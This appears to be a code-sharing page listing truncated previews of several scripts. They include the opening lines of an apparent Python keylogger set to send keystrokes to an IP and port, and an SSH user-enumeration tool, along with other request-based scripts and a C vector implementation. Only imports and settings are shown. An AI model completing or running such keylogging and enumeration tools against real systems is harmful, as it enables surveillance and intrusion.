This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pynput import keyboard | |
import requests | |
import threading | |
text = "" | |
ip_address = "192.168.0.21" | |
port_number = 8080 | |
time_interval = 10 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from typing import Tuple | |
import requests | |
import zipfile | |
import os | |
import argparse | |
def parse_args() -> Tuple[str, str]: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import string | |
import requests | |
from concurrent.futures import ThreadPoolExecutor | |
from urllib.parse import quote | |
from time import time | |
from argparse import ArgumentParser | |
from typing import Tuple |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include<stdio.h> | |
#include<stdlib.h> | |
struct Vector { | |
int* items = NULL; | |
int size = 0; | |
int capacity = 0; | |
}; | |
void push(Vector &v, int data) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Connect to ssh to check if user exists | |
# Import modules | |
import paramiko | |
import argparse | |
import concurrent.futures | |
found_users = [] |
NewerOlder